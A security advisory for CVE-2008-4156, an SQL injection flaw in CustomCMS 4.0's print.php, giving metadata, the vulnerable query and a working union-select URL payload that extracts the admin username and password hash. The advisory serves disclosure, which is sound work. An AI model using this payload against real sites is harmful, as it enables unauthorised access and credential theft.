Topic : | CustomCMS 4.0 (CCMS) print.php Remote SQL Injection Vulnerability
|
SecurityAlert : 4281
CVE : CVE-2008-4156
CWE : CWE-89
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : ~!Dok_tOR!~
Published : 23.09.2008
Affected Software : | customcms:gaming_portal:4.0 |
 Advisory Content : Author: ~!Dok_tOR!~
Date found: 21.08.08
Product: CCMS Gaming Portal
Version: 4.0
The price: $55
URL: customcms.net
Vulnerability Class: SQL injection
print.php
Vuln code:
$q = mysql_query("SELECT * from ccms_news_comments WHERE w_id='$id'");
magic_quotes_gpc = Off
http://localhost/[installdir]/
Exploit:
print.php?id='+union+select+1,concat_ws(0x3a,usern
ame,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1
7,18,19,20,21+from+ccms_user+where+userid=1/*
References :
http://securityreason.com/expldownload/1/4518/1 (Exploit)
http://www.securityfocus.com/bid/30787
http://www.milw0rm.com/exploits/6284
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|